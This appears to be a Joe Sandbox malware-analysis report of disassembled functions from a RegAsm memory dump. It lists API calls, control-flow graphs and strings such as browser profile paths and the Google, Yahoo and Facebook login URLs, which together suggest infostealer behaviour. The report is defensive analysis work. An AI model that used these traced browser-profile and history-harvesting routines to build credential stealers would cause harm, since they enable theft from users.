                                                                                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                      • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                      • String ID: bhv
                                                                                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                                                                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                                                      • __p__commode.MSVCRT ref: 00446785
                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                                                      • _initterm.MSVCRT ref: 004467C7
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                                                      • _initterm.MSVCRT ref: 004467FD
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                                                      • exit.MSVCRT ref: 00446897
                                                                                                                                                                      • _cexit.MSVCRT ref: 0044689D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2791496988-0
                                                                                                                                                                      • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                      • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                      • String ID: visited:
                                                                                                                                                                      • API String ID: 2470578098-1702587658
                                                                                                                                                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                                                                                      • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                      • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                      • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 115830560-3916222277
                                                                                                                                                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                      • API String ID: 2791114272-628097481
                                                                                                                                                                      • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                      • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                                                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                      • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                      • String ID: BIN
                                                                                                                                                                      • API String ID: 1668488027-1015027815
                                                                                                                                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                      • API String ID: 4039892925-11920434
                                                                                                                                                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                      • API String ID: 4039892925-2068335096
                                                                                                                                                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
